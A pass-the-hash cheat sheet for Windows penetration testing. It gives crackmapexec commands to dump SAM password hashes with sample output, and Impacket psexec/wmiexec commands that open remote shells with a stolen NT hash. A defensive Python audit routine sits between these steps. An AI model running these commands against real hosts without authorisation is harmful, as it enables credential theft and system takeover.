Pass The Hash

Windows

If you have a user with administrative privileges on the host (crackmapexec marks this as Pwn3d!), you can retrieve the SAM hashes, i.e. the local users' password hashes. First confirm the access:
crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD'
...
SMB 10.10.10.10 445 LOCAL [+] local\USERNAME:PASSWORD (Pwn3d!)
The same crackmapexec session can dump the SAM with --sam:
crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD' --sam
...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...USERNAME:1000:aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5:::
...user3$:1002:aad3b435b51404eeaad3b435b51404ee:ed3c759dafa8d554e038c2152aa67cb3:::
...user1:1003:aad3b435b51404eeaad3b435b51404ee:3a7ac3205a1b5d1fcd63fb5d509a6d67:::
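Each dump line is in pwdump format, user:RID:LMHASH:NTHASH:::, and two values recur: aad3b435b51404eeaad3b435b51404ee is the placeholder written when no LM hash is stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The following parser and audit routine is an added example (not code from the cheat sheet, crackmapexec or Impacket) that reads the dump shown above and lists what a defender should act on: blank passwords, exposed NT hashes to rotate, stored LM hashes and passwords shared between accounts.

```python
"""Audit a SAM dump in pwdump format (user:RID:LMHASH:NTHASH:::).
Added example, not part of the cheat sheet, crackmapexec or Impacket; the sample dump is the page's."""
import re

# Well-known constants: the LM field written when no LM hash is stored, and the
# NT hash (MD4 of the empty UTF-16LE string) that corresponds to a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)

SAMPLE_DUMP = """\
...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...USERNAME:1000:aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5:::
...user3$:1002:aad3b435b51404eeaad3b435b51404ee:ed3c759dafa8d554e038c2152aa67cb3:::
...user1:1003:aad3b435b51404eeaad3b435b51404ee:3a7ac3205a1b5d1fcd63fb5d509a6d67:::
"""

def parse_pwdump(text):
    """Parse dump lines into dicts; the '...' prefix of pasted tool output is tolerated."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip().lstrip("."))
        if m:  # anything that is not a pwdump line (banners, blank lines) is skipped
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
            records.append(rec)
    return records

def audit(records):
    """Return (user, finding) pairs a defender should act on after such a dump."""
    findings, by_nt = [], {}
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password (empty NT hash)"))
        else:
            # Any real NT hash stays replayable over SMB/WMI until the password is changed.
            findings.append((r["user"], "NT hash exposed: rotate password"))
            by_nt.setdefault(r["nt"], []).append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (trivially crackable)"))
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((",".join(users), "same password shared by several accounts"))
    return findings
```

On the page's dump this flags Administrator and Guest as blank-password accounts and the three remaining accounts as having exposed NT hashes, with no LM hashes stored.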
With those hashes, and without knowing the cleartext password, we can obtain a command shell using several Impacket tools; the -hashes argument takes LMHASH:NTHASH as dumped above:
psexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
wmiexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
Or, when the cleartext password is known, simply with credentials:
psexec.py USERNAME:PASSWORD@10.10.10.10
wmiexec.py USERNAME:PASSWORD@10.10.10.10